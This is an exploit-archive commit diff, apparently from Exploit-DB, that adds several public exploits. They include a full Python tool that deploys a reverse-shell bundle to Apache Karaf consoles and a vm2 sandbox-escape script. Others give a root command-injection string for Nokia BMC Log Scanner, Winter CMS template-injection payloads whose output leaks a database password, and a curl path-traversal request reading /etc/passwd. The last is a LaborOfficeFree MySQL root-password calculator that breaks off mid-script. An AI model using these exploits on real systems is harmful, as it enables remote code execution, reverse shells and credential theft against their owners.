DB: 2024-03-17

7 changes to exploits/shellcodes/ghdb Karaf v4.4.3 Console - RCE Nokia BMC Log Scanner - Remote Code Execution vm2 - sandbox escape UPS Network Management Card 4 - Path Traversal Winter CMS 1.2.3 - Server-Side Template Injection (SSTI) (Authenticated) LaborOfficeFree 19.10 - MySQL Root Password Calculator
2024-03-17 00:16:40 +00:00 · 2024-03-17 00:16:40 +00:00 · 8c78d80c78
commit 8c78d80c78
parent 2af1700331
7 changed files with 688 additions and 0 deletions
--- a/exploits/java/webapps/51895.py
+++ b/exploits/java/webapps/51895.py
@ -0,0 +1,427 @@
 #!/usr/bin/python
 # Exploit Title: [Karaf v4.4.3 Console RCE]
 # Date: [2023-08-07]
 # Exploit Author: [Andrzej Olchawa, Milenko Starcik,
 #                  VisionSpace Technologies GmbH]
 # Exploit Repository:
 #           [https://github.com/visionspacetec/offsec-karaf-exploits.git]
 # Vendor Homepage: [https://karaf.apache.org]
 # Software Link: [https://karaf.apache.org/download.html]
 # Version: [4.4.3]
 # Tested on: [Linux kali 6.3.0-kali1-amd64]
 # License: [MIT]
 #
 # Usage:
 # python exploit.py --help
 #
 # Example:
 # python exploit.py --rhost=192.168.0.133 --rport=1337 \
 #                   --lhost=192.168.0.100 --lport=4444 \
 #                   --creds=karaf:karaf
 """
 This tool will let you open a reverse shell from the system
 that is running Karaf Console",
 """
 import argparse
 import base64
 import io
 import re
 import zipfile
 import requests
 # Content of the MANIFEST.MF file.
 MANIFEST_CONTENT = \
    "Bundle-Name: RevShell\n" \
    "Bundle-Description: Bundle openning a reverse shell connection.\n" \
    "Bundle-SymbolicName: com.visionspace.osgi.revshell.Activator\n" \
    "Bundle-Vendor: VisionSpace\n" \
    "Bundle-Version: 1.0.0\n" \
    "Import-Package: org.osgi.framework\n" \
    "Bundle-Activator: com.visionspace.osgi.revshell.Activator"
 # Activator.class bytecode template.
 ACTIVATOR_CLASS_BYTECODE_TEMPLATE = \
    b"\xca\xfe\xba\xbe\x00\x00\x00\x37\x00\x7b" \
    b"\x0a\x00\x22\x00\x33\x08\x00\x34\x07\x00" \
    b"\x35\x07\x00\x36\x0a\x00\x03\x00\x37\x0a" \
    b"\x00\x03\x00\x38\x0a\x00\x03\x00\x39\x07" \
    b"\x00\x3a\x08\x00\x3b\x08\x00\x3c\x0a\x00" \
    b"\x3d\x00\x3e\x0a\x00\x08\x00\x3f\x0a\x00" \
    b"\x2c\x00\x40\x0a\x00\x2c\x00\x41\x0a\x00" \
    b"\x08\x00\x40\x0a\x00\x2c\x00\x42\x0a\x00" \
    b"\x08\x00\x42\x0a\x00\x08\x00\x43\x0a\x00" \
    b"\x2d\x00\x44\x0a\x00\x2d\x00\x45\x0a\x00" \
    b"\x2e\x00\x46\x0a\x00\x2e\x00\x47\x05\x00" \
    b"\x00\x00\x00\x00\x00\x00\x32\x0a\x00\x48" \
    b"\x00\x49\x0a\x00\x2c\x00\x4a\x07\x00\x4b" \
    b"\x0a\x00\x2c\x00\x4c\x0a\x00\x08\x00\x4d" \
    b"\x09\x00\x4e\x00\x4f\x08\x00\x50\x0a\x00" \
    b"\x51\x00\x52\x07\x00\x53\x07\x00\x54\x07" \
    b"\x00\x55\x01\x00\x06\x3c\x69\x6e\x69\x74" \
    b"\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04" \
    b"\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e" \
    b"\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62" \
    b"\x6c\x65\x01\x00\x05\x73\x74\x61\x72\x74" \
    b"\x01\x00\x25\x28\x4c\x6f\x72\x67\x2f\x6f" \
    b"\x73\x67\x69\x2f\x66\x72\x61\x6d\x65\x77" \
    b"\x6f\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65" \
    b"\x43\x6f\x6e\x74\x65\x78\x74\x3b\x29\x56" \
    b"\x01\x00\x0d\x53\x74\x61\x63\x6b\x4d\x61" \
    b"\x70\x54\x61\x62\x6c\x65\x07\x00\x56\x07" \
    b"\x00\x57\x07\x00\x58\x07\x00\x59\x01\x00" \
    b"\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e" \
    b"\x73\x01\x00\x04\x73\x74\x6f\x70\x01\x00" \
    b"\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c" \
    b"\x65\x01\x00\x0e\x41\x63\x74\x69\x76\x61" \
    b"\x74\x6f\x72\x2e\x6a\x61\x76\x61\x0c\x00" \
    b"\x24\x00\x25\x01\x00\x02\x73\x68\x01\x00" \
    b"\x18\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \
    b"\x2f\x50\x72\x6f\x63\x65\x73\x73\x42\x75" \
    b"\x69\x6c\x64\x65\x72\x01\x00\x10\x6a\x61" \
    b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74" \
    b"\x72\x69\x6e\x67\x0c\x00\x24\x00\x5a\x0c" \
    b"\x00\x5b\x00\x5c\x0c\x00\x28\x00\x5d\x01" \
    b"\x00\x0f\x6a\x61\x76\x61\x2f\x6e\x65\x74" \
    b"\x2f\x53\x6f\x63\x6b\x65\x74\x01\x00\x07" \
    b"\x3c\x4c\x48\x4f\x53\x54\x3e\x01\x00\x07" \
    b"\x3c\x4c\x50\x4f\x52\x54\x3e\x07\x00\x5e" \
    b"\x0c\x00\x5f\x00\x60\x0c\x00\x24\x00\x61" \
    b"\x0c\x00\x62\x00\x63\x0c\x00\x64\x00\x63" \
    b"\x0c\x00\x65\x00\x66\x0c\x00\x67\x00\x68" \
    b"\x0c\x00\x69\x00\x6a\x0c\x00\x6b\x00\x6a" \
    b"\x0c\x00\x6c\x00\x6d\x0c\x00\x6e\x00\x25" \
    b"\x07\x00\x6f\x0c\x00\x70\x00\x71\x0c\x00" \
    b"\x72\x00\x6a\x01\x00\x13\x6a\x61\x76\x61" \
    b"\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65" \
    b"\x70\x74\x69\x6f\x6e\x0c\x00\x73\x00\x25" \
    b"\x0c\x00\x74\x00\x25\x07\x00\x75\x0c\x00" \
    b"\x76\x00\x77\x01\x00\x1d\x54\x68\x61\x6e" \
    b"\x6b\x20\x79\x6f\x75\x20\x66\x6f\x72\x20" \
    b"\x70\x77\x6e\x69\x6e\x67\x20\x77\x69\x74" \
    b"\x68\x20\x75\x73\x21\x07\x00\x78\x0c\x00" \
    b"\x79\x00\x7a\x01\x00\x27\x63\x6f\x6d\x2f" \
    b"\x76\x69\x73\x69\x6f\x6e\x73\x70\x61\x63" \
    b"\x65\x2f\x6f\x73\x67\x69\x2f\x72\x65\x76" \
    b"\x73\x68\x65\x6c\x6c\x2f\x41\x63\x74\x69" \
    b"\x76\x61\x74\x6f\x72\x01\x00\x10\x6a\x61" \
    b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62" \
    b"\x6a\x65\x63\x74\x01\x00\x22\x6f\x72\x67" \
    b"\x2f\x6f\x73\x67\x69\x2f\x66\x72\x61\x6d" \
    b"\x65\x77\x6f\x72\x6b\x2f\x42\x75\x6e\x64" \
    b"\x6c\x65\x41\x63\x74\x69\x76\x61\x74\x6f" \
    b"\x72\x01\x00\x20\x6f\x72\x67\x2f\x6f\x73" \
    b"\x67\x69\x2f\x66\x72\x61\x6d\x65\x77\x6f" \
    b"\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65\x43" \
    b"\x6f\x6e\x74\x65\x78\x74\x01\x00\x11\x6a" \
    b"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50" \
    b"\x72\x6f\x63\x65\x73\x73\x01\x00\x13\x6a" \
    b"\x61\x76\x61\x2f\x69\x6f\x2f\x49\x6e\x70" \
    b"\x75\x74\x53\x74\x72\x65\x61\x6d\x01\x00" \
    b"\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x4f" \
    b"\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61" \
    b"\x6d\x01\x00\x16\x28\x5b\x4c\x6a\x61\x76" \
    b"\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72" \
    b"\x69\x6e\x67\x3b\x29\x56\x01\x00\x13\x72" \
    b"\x65\x64\x69\x72\x65\x63\x74\x45\x72\x72" \
    b"\x6f\x72\x53\x74\x72\x65\x61\x6d\x01\x00" \
    b"\x1d\x28\x5a\x29\x4c\x6a\x61\x76\x61\x2f" \
    b"\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63\x65" \
    b"\x73\x73\x42\x75\x69\x6c\x64\x65\x72\x3b" \
    b"\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61" \
    b"\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63" \
    b"\x65\x73\x73\x3b\x01\x00\x11\x6a\x61\x76" \
    b"\x61\x2f\x6c\x61\x6e\x67\x2f\x49\x6e\x74" \
    b"\x65\x67\x65\x72\x01\x00\x08\x70\x61\x72" \
    b"\x73\x65\x49\x6e\x74\x01\x00\x15\x28\x4c" \
    b"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f" \
    b"\x53\x74\x72\x69\x6e\x67\x3b\x29\x49\x01" \
    b"\x00\x16\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \
    b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \
    b"\x3b\x49\x29\x56\x01\x00\x0e\x67\x65\x74" \
    b"\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61" \
    b"\x6d\x01\x00\x17\x28\x29\x4c\x6a\x61\x76" \
    b"\x61\x2f\x69\x6f\x2f\x49\x6e\x70\x75\x74" \
    b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x0e" \
    b"\x67\x65\x74\x45\x72\x72\x6f\x72\x53\x74" \
    b"\x72\x65\x61\x6d\x01\x00\x0f\x67\x65\x74" \
    b"\x4f\x75\x74\x70\x75\x74\x53\x74\x72\x65" \
    b"\x61\x6d\x01\x00\x18\x28\x29\x4c\x6a\x61" \
    b"\x76\x61\x2f\x69\x6f\x2f\x4f\x75\x74\x70" \
    b"\x75\x74\x53\x74\x72\x65\x61\x6d\x3b\x01" \
    b"\x00\x08\x69\x73\x43\x6c\x6f\x73\x65\x64" \
    b"\x01\x00\x03\x28\x29\x5a\x01\x00\x09\x61" \
    b"\x76\x61\x69\x6c\x61\x62\x6c\x65\x01\x00" \
    b"\x03\x28\x29\x49\x01\x00\x04\x72\x65\x61" \
    b"\x64\x01\x00\x05\x77\x72\x69\x74\x65\x01" \
    b"\x00\x04\x28\x49\x29\x56\x01\x00\x05\x66" \
    b"\x6c\x75\x73\x68\x01\x00\x10\x6a\x61\x76" \
    b"\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72" \
    b"\x65\x61\x64\x01\x00\x05\x73\x6c\x65\x65" \
    b"\x70\x01\x00\x04\x28\x4a\x29\x56\x01\x00" \
    b"\x09\x65\x78\x69\x74\x56\x61\x6c\x75\x65" \
    b"\x01\x00\x07\x64\x65\x73\x74\x72\x6f\x79" \
    b"\x01\x00\x05\x63\x6c\x6f\x73\x65\x01\x00" \
    b"\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \
    b"\x2f\x53\x79\x73\x74\x65\x6d\x01\x00\x03" \
    b"\x6f\x75\x74\x01\x00\x15\x4c\x6a\x61\x76" \
    b"\x61\x2f\x69\x6f\x2f\x50\x72\x69\x6e\x74" \
    b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x13" \
    b"\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x50\x72" \
    b"\x69\x6e\x74\x53\x74\x72\x65\x61\x6d\x01" \
    b"\x00\x07\x70\x72\x69\x6e\x74\x6c\x6e\x01" \
    b"\x00\x15\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \
    b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \
    b"\x3b\x29\x56\x00\x21\x00\x21\x00\x22\x00" \
    b"\x01\x00\x23\x00\x00\x00\x03\x00\x01\x00" \
    b"\x24\x00\x25\x00\x01\x00\x26\x00\x00\x00" \
    b"\x1d\x00\x01\x00\x01\x00\x00\x00\x05\x2a" \
    b"\xb7\x00\x01\xb1\x00\x00\x00\x01\x00\x27" \
    b"\x00\x00\x00\x06\x00\x01\x00\x00\x00\x0a" \
    b"\x00\x01\x00\x28\x00\x29\x00\x02\x00\x26" \
    b"\x00\x00\x01\x6e\x00\x06\x00\x0b\x00\x00" \
    b"\x00\xb8\x12\x02\x4d\xbb\x00\x03\x59\x04" \
    b"\xbd\x00\x04\x59\x03\x2c\x53\xb7\x00\x05" \
    b"\x04\xb6\x00\x06\xb6\x00\x07\x4e\xbb\x00" \
    b"\x08\x59\x12\x09\x12\x0a\xb8\x00\x0b\xb7" \
    b"\x00\x0c\x3a\x04\x2d\xb6\x00\x0d\x3a\x05" \
    b"\x2d\xb6\x00\x0e\x3a\x06\x19\x04\xb6\x00" \
    b"\x0f\x3a\x07\x2d\xb6\x00\x10\x3a\x08\x19" \
    b"\x04\xb6\x00\x11\x3a\x09\x19\x04\xb6\x00" \
    b"\x12\x9a\x00\x5f\x19\x05\xb6\x00\x13\x9e" \
    b"\x00\x10\x19\x09\x19\x05\xb6\x00\x14\xb6" \
    b"\x00\x15\xa7\xff\xee\x19\x06\xb6\x00\x13" \
    b"\x9e\x00\x10\x19\x09\x19\x06\xb6\x00\x14" \
    b"\xb6\x00\x15\xa7\xff\xee\x19\x07\xb6\x00" \
    b"\x13\x9e\x00\x10\x19\x08\x19\x07\xb6\x00" \
    b"\x14\xb6\x00\x15\xa7\xff\xee\x19\x09\xb6" \
    b"\x00\x16\x19\x08\xb6\x00\x16\x14\x00\x17" \
    b"\xb8\x00\x19\x2d\xb6\x00\x1a\x57\xa7\x00" \
    b"\x08\x3a\x0a\xa7\xff\x9f\x2d\xb6\x00\x1c" \
    b"\x19\x04\xb6\x00\x1d\xb1\x00\x01\x00\xa1" \
    b"\x00\xa6\x00\xa9\x00\x1b\x00\x02\x00\x27" \
    b"\x00\x00\x00\x66\x00\x19\x00\x00\x00\x0c" \
    b"\x00\x03\x00\x0e\x00\x1a\x00\x0f\x00\x2a" \
    b"\x00\x10\x00\x30\x00\x11\x00\x36\x00\x12" \
    b"\x00\x3d\x00\x13\x00\x43\x00\x14\x00\x4a" \
    b"\x00\x15\x00\x52\x00\x16\x00\x5a\x00\x17" \
    b"\x00\x67\x00\x18\x00\x6f\x00\x19\x00\x7c" \
    b"\x00\x1a\x00\x84\x00\x1b\x00\x91\x00\x1c" \
    b"\x00\x96\x00\x1d\x00\x9b\x00\x1e\x00\xa1" \
    b"\x00\x20\x00\xa6\x00\x21\x00\xa9\x00\x22" \
    b"\x00\xab\x00\x23\x00\xae\x00\x25\x00\xb2" \
    b"\x00\x26\x00\xb7\x00\x27\x00\x2a\x00\x00" \
    b"\x00\x30\x00\x07\xff\x00\x4a\x00\x0a\x07" \
    b"\x00\x21\x07\x00\x2b\x07\x00\x04\x07\x00" \
    b"\x2c\x07\x00\x08\x07\x00\x2d\x07\x00\x2d" \
    b"\x07\x00\x2d\x07\x00\x2e\x07\x00\x2e\x00" \
    b"\x00\x07\x14\x14\x14\x57\x07\x00\x1b\x04" \
    b"\x00\x2f\x00\x00\x00\x04\x00\x01\x00\x1b" \
    b"\x00\x01\x00\x30\x00\x29\x00\x02\x00\x26" \
    b"\x00\x00\x00\x25\x00\x02\x00\x02\x00\x00" \
    b"\x00\x09\xb2\x00\x1e\x12\x1f\xb6\x00\x20" \
    b"\xb1\x00\x00\x00\x01\x00\x27\x00\x00\x00" \
    b"\x0a\x00\x02\x00\x00\x00\x2a\x00\x08\x00" \
    b"\x2b\x00\x2f\x00\x00\x00\x04\x00\x01\x00" \
    b"\x1b\x00\x01\x00\x31\x00\x00\x00\x02\x00" \
    b"\x32"
 # Items to be replaces within the bytecode of Activator.class
 # <LEN><LHOST> = <\x07><\x3c\x4c\x48\x4f\x53\x54\x3e>
 ACTIVATOR_CLASS_LHOST_TAG = b"\x07\x3c\x4c\x48\x4f\x53\x54\x3e"
 # <LEN><LPORT> = <\x07><\x3c\x4c\x50\x4f\x52\x54\x3e>
 ACTIVATOR_CLASS_LPORT_TAG = b"\x07\x3c\x4c\x50\x4f\x52\x54\x3e"
 def parse():
    """
    This function parses the command-line arguments.
    """
    parser = argparse.ArgumentParser(
        prog="Karaf-Console-RCE",
        description="This tool will let you open a reverse shell from the "
                    "system that is running Karaf Console",
        epilog="Happy Hacking! :)",
    )
    parser.add_argument("--rhost", dest="rhost",
                        help="remote host", type=str, required=True)
    parser.add_argument("--rport", dest="rport",
                        help="remote port", type=int, required=True)
    parser.add_argument("--lhost", dest="lhost",
                        help="local host", type=str, required=True)
    parser.add_argument("--lport", dest="lport",
                        help="local port", type=int, required=True)
    parser.add_argument("--creds", dest="creds",
                        help="credentials in format <username:password>",
                        type=str, required=True)
    parser.add_argument("--version", action="version",
                        version="%(prog)s 0.1.0")
    return parser.parse_args()
 def extract_jsessionid(cookie):
    """
    This function extracts the JSESSIONID from the cookie string.
    """
    jsessionid = None
    regex = re.findall("JSESSIONID=([^;]+)", cookie)
    if len(regex) > 0:
        jsessionid = regex[0]
    return jsessionid
 def authenticate(target, basic_auth):
    """
    This function connects to the URL and retrieves the JSESSIONID
    based on the Basic Authorization.
    """
    jsessionid = None
    headers = {
        "Authorization": basic_auth
    }
    response = requests.get(target, headers=headers,
                            allow_redirects=False, timeout=10)
    if (response.status_code == 302 and response.headers["Set-Cookie"]):
        jsessionid = extract_jsessionid(response.headers["Set-Cookie"])
    return jsessionid
 def generate_payload(lhost, lport):
    """
    This function generates the payload.
    It replaces the template payload with the `lhost` and `lport` arguments.
    """
    payload = None
    lhost_byte_array = bytearray()
    lhost_byte_array.append(len(lhost))
    lhost_byte_array.extend(map(ord, lhost))
    activator_class_bytecodes = ACTIVATOR_CLASS_BYTECODE_TEMPLATE.replace(
        ACTIVATOR_CLASS_LHOST_TAG, lhost_byte_array)
    lport_str = str(lport)
    lport_byte_array = bytearray()
    lport_byte_array.append(len(lport_str))
    lport_byte_array.extend(map(ord, lport_str))
    activator_class_bytecodes = activator_class_bytecodes.replace(
        ACTIVATOR_CLASS_LPORT_TAG, lport_byte_array)
    jar_bytes = io.BytesIO()
    with zipfile.ZipFile(jar_bytes, "w", zipfile.ZIP_DEFLATED) as zip_file:
        zip_file.writestr("com/visionspace/osgi/revshell/Activator.class",
                          activator_class_bytecodes)
        zip_file.writestr("META-INF/MANIFEST.MF", MANIFEST_CONTENT)
    payload = jar_bytes.getvalue()
    return payload
 def deploy_payload(target, basic_auth, jsessionid, payload):
    """
    This function connects to the Karaf Console and deployes the payload.
    """
    success = False
    url = f"{target}/bundles"
    cookies = {
        "JSESSIONID": jsessionid
    }
    headers = {
        "Authorization": basic_auth
    }
    files = {
        "bundlefile": (
            "revshell.jar", payload, "application/x-java-archive")
    }
    data = {
        "action": "install",
        "bundlestart": "start",
        "bundlestartlevel": 80
    }
    response = requests.post(url, headers=headers, cookies=cookies,
                             files=files, data=data, timeout=10,
                             allow_redirects=False)
    if response.status_code == 302:
        success = True
    return success
 def generate_basic_auth(creds):
    """
    This function generates the Basic Authorization string based
    on the credentials.
    """
    creds_base64 = base64.b64encode(creds.encode()).decode()
    basic_auth = f"Basic {creds_base64}"
    return basic_auth
 def create_target_url(rhost, rport):
    """
    This function creates a target URL.
    """
    target_url = f"http://{rhost}:{rport}/system/console"
    return target_url
 def main(args):
    """
    Main function.
    """
    target = create_target_url(args.rhost, args.rport)
    print("[*] Login...")
    basic_auth = generate_basic_auth(args.creds)
    jsessionid = authenticate(target, basic_auth)
    if jsessionid:
        print("[+] Session established.")
        print("[*] Generating payload...")
        payload = generate_payload(args.lhost, args.lport)
        if payload:
            print("[*] Deploying payload...")
            if deploy_payload(target, basic_auth, jsessionid, payload):
                print("[+] Done.")
            else:
                print("[-] Failed to deploy the payload!")
        else:
            print("[-] Failed to generate the payload!")
    else:
        print("[-] Login failed!")
 if __name__ == "__main__":
    main(parse())
--- a/exploits/linux/webapps/51896.txt
+++ b/exploits/linux/webapps/51896.txt
@ -0,0 +1,25 @@
 # Exploit Title: Nokia BMC Log Scanner Remote Code Execution
 # Google Dork: N/A
 # Date: November 29, 2023
 # Exploit Author: Carlos Andres Gonzalez, Matthew Gregory
 # Vendor Homepage: https://www.nokia.com/
 # Software Link: N/A
 # Version: 13
 # Tested on: Linux
 # CVE : CVE-2022-45899
 Description
 The BMC Log Scanner web application, available on several hosts, is vulnerable to command injection
 attacks, allowing for unauthenticated remote code execution. This vulnerability is especially significant
 because this service runs as root.
 Steps to Reproduce:
 In the Search Pattern field, type:
 ;";command
 Replacing the word "command" above with any Linux command.
 Root access can be confirmed with the id command or any other command that would require
 root access, such as displaying the contents of the /etc/shadow file."
 This issue was fixed in version 13.1.
--- a/exploits/multiple/local/51898.c
+++ b/exploits/multiple/local/51898.c
@ -0,0 +1,44 @@
 /*
 # Exploit Title: vm2 Sandbox Escape vulnerability
 # Date: 23/12/2023
 # Exploit Author: Calil Khalil & Adriel Mc Roberts
 # Vendor Homepage: https://github.com/patriksimek/vm2
 # Software Link: https://github.com/patriksimek/vm2
 # Version: vm2 <= 3.9.19
 # Tested on: Ubuntu 22.04
 # CVE : CVE-2023-37466
 */
 const { VM } = require("vm2");
 const vm = new VM();
 const command = 'pwd'; // Change to the desired command
 const code = `
 async function fn() {
    (function stack() {
        new Error().stack;
        stack();
    })();
 }
 try {
    const handler = {
        getPrototypeOf(target) {
            (function stack() {
                new Error().stack;
                stack();
            })();
        }
    };
    const proxiedErr = new Proxy({}, handler);
    throw proxiedErr;
 } catch ({ constructor: c }) {
    const childProcess = c.constructor('return process')().mainModule.require('child_process');
    childProcess.execSync('${command}');
 }
 `;
 console.log(vm.run(code));
--- a/exploits/php/webapps/51893.txt
+++ b/exploits/php/webapps/51893.txt
@ -0,0 +1,74 @@
 # Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated)
 # Exploit Author: tmrswrr
 # Date: 12/05/2023
 # Vendor: https://wintercms.com/
 # Software Link: https://github.com/wintercms/winter/releases/v1.2.2
 # Vulnerable Version(s): 1.2.2
 #Tested : https://www.softaculous.com/demos/WinterCMS
 1 ) Login with admin cred and click CMS > Pages field > Plugin components >
    https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup
 2 ) Write SSTI payload : {{7*7}}
 3 ) Save it , Click Priview :
    https://demos6.demo.com/WinterCMS/demo/plugins
 4 ) You will be see result :
    49
 Payload :
    {{ dump() }}
 Result :
        "*::database" => array:4 [▼
          "default" => "mysql"
          "connections" => array:4 [▼
            "sqlite" => array:5 [▼
              "database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite"
              "driver" => "sqlite"
              "foreign_key_constraints" => true
              "prefix" => ""
              "url" => null
            ]
            "mysql" => array:15 [▼
              "charset" => "utf8mb4"
              "collation" => "utf8mb4_unicode_ci"
              "database" => "soft_pw3qsny"
              "driver" => "mysql"
              "engine" => "InnoDB"
              "host" => "localhost"
              "options" => []
              "password" => "8QSz9(pT)3"
              "port" => 3306
              "prefix" => ""
              "prefix_indexes" => true
              "strict" => true
              "unix_socket" => ""
              "url" => null
              "username" => "soft_pw3qsny"
            ]
            "pgsql" => array:12 [▶]
            "sqlsrv" => array:10 [▶]
          ]
          "migrations" => "migrations"
          "redis" => array:4 [▼
            "client" => "phpredis"
            "options" => array:2 [▼
              "cluster" => "redis"
              "prefix" => "winter_database_"
            ]
            "default" => array:5 [▼
              "database" => "0"
              "host" => "127.0.0.1"
              "password" => null
              "port" => "6379"
              "url" => null
            ]
            "cache" => array:5 [▼
              "database" => "1"
              "host" => "127.0.0.1"
              "password" => null
              "port" => "6379"
              "url" => null
            ]
          ]
        ]
      ]
--- a/exploits/php/webapps/51897.txt
+++ b/exploits/php/webapps/51897.txt
@ -0,0 +1,34 @@
 # Exploit Title: UPS Network Management Card 4 - Path Traversal
 # Google Dork: inurl:nmc inurl:logon.htm
 # Date: 2023-12-19
 # Exploit Author: Víctor García
 # Vendor Homepage: https://www.apc.com/
 # Version: 4
 # Tested on: Kali Linux
 # CVE: N/A
 # PoC:
 curl -k
 https://10.10.10.10/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
 root:x:0:0:root:/home/root:/bin/sh
 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/bin/sh
 man:x:6:12:man:/var/cache/man:/bin/sh
 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 mail:x:8:8:mail:/var/mail:/bin/sh
 news:x:9:9:news:/var/spool/news:/bin/sh
 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 proxy:x:13:13:proxy:/bin:/bin/sh
 www-data:x:33:33:www-data:/var/www:/bin/sh
 backup:x:34:34:backup:/var/backups:/bin/sh
 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 dhcp:x:997:997::/var/run/dhcp:/bin/false
 messagebus:x:998:998::/var/lib/dbus:/bin/false
 mosquitto:x:999:999::/home/mosquitto:/bin/false
 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
--- a/exploits/windows/local/51894.py
+++ b/exploits/windows/local/51894.py
@ -0,0 +1,78 @@
 # Exploit Title: LaborOfficeFree 19.10 MySQL Root Password Calculator - CVE-2024-1346
 # Google Dork: N/A
 # Date: 09/02/2023
 # Exploit Author: Peter Gabaldon - https://pgj11.com/
 # Vendor Homepage: https://www.laborofficefree.com/
 # Software Link: https://www.laborofficefree.com/#plans
 # Version: 19.10
 # Tested on: Windows 10
 # CVE : CVE-2024-1346
 # Description: LaborOfficeFree installs a MySQL instance that runs as SYSTEM and calculates the MySQL root password based on two constants. Each time the program needs to connect to MySQL as root, it employs the reverse algorithm to calculate the root password. This issue has been tested on version 19.10 exclusively, but allegedly, versions prior to 19.10 are also vulnerable.
 """
 	After installing LaborOfficeFree in testing lab and revesing the backup process, it is possible to determine that it creates a "mysqldump.exe" process with the root user and the password being derived from the string "hola" concated with "00331-20471-98465-AA370" (in this case). This appears to be the license, but it is different from the license shown in the GUI dashboard. This license has to be extracted from memory. From example, attaching a debugger and breaking in the mysqldump process (for that, admin rights are NOT needed).
    Also, the app checks if you are an admin to perform the backup and fails if the program is not running as adminsitrator. But, this check is not effective, as it is actually calling mysqldump with a derived password. Thus, administrator right are not needed.
    Here is the disassembly piece of the procedure in LaborOfficeFree.exe responsible of calculating the root password.
    00506548 | 53                       | push ebx                                | Aqui se hacen el XOR y demas que calcula la pwd :)
    00506549 | 56                       | push esi                                |
    0050654A | A3 7CFD8800              | mov dword ptr ds:[88FD7C],eax           | eax:"hola00331-20471-98465-AA370"
    0050654F | 0FB7C2                   | movzx eax,dx                            | eax:"hola00331-20471-98465-AA370"
    00506552 | 85C0                     | test eax,eax                            | eax:"hola00331-20471-98465-AA370"
    00506554 | 7E 2E                    | jle laborofficefree.506584              |
    00506556 | BA 01000000              | mov edx,1                               |
    0050655B | 8B1D 7CFD8800            | mov ebx,dword ptr ds:[88FD7C]           |
    00506561 | 0FB65C13 FF              | movzx ebx,byte ptr ds:[ebx+edx-1]       |
    00506566 | 8B31                     | mov esi,dword ptr ds:[ecx]              |
    00506568 | 81E6 FF000000            | and esi,FF                              |
    0050656E | 33DE                     | xor ebx,esi                             |
    00506570 | 8B1C9D A40B8800          | mov ebx,dword ptr ds:[ebx*4+880BA4]     |
    00506577 | 8B31                     | mov esi,dword ptr ds:[ecx]              |
    00506579 | C1EE 08                  | shr esi,8                               |
    0050657C | 33DE                     | xor ebx,esi                             |
    0050657E | 8919                     | mov dword ptr ds:[ecx],ebx              |
    00506580 | 42                       | inc edx                                 |
    00506581 | 48                       | dec eax                                 | eax:"hola00331-20471-98465-AA370"
    00506582 | 75 D7                    | jne laborofficefree.50655B              |
    00506584 | 5E                       | pop esi                                 |
    00506585 | 5B                       | pop ebx                                 |
    00506586 | C3                       | ret                                     |
    The result number from this procedure is then negated (bitwise NOT) and casted as a signed integer. Note: the address 0x880BA4 stores a constant array of 256 DWORDs entries.
    005065C8 | F755 F8                  | not dword ptr ss:[ebp-8]                |
 	Running this script produces the root password of the LaborOfficeFree MySQL.
    C:\Users\***\Desktop>python myLaborRootPwdCalculator.py
    1591779762
    C:\Users\***\Desktop>
 """
 #! /usr/bin/python3
 from operator import xor
 import ctypes
 if __name__ == "__main__":
 	magic_str = "hola00331-20471-98465-AA370"
 	mask = 0x000000ff
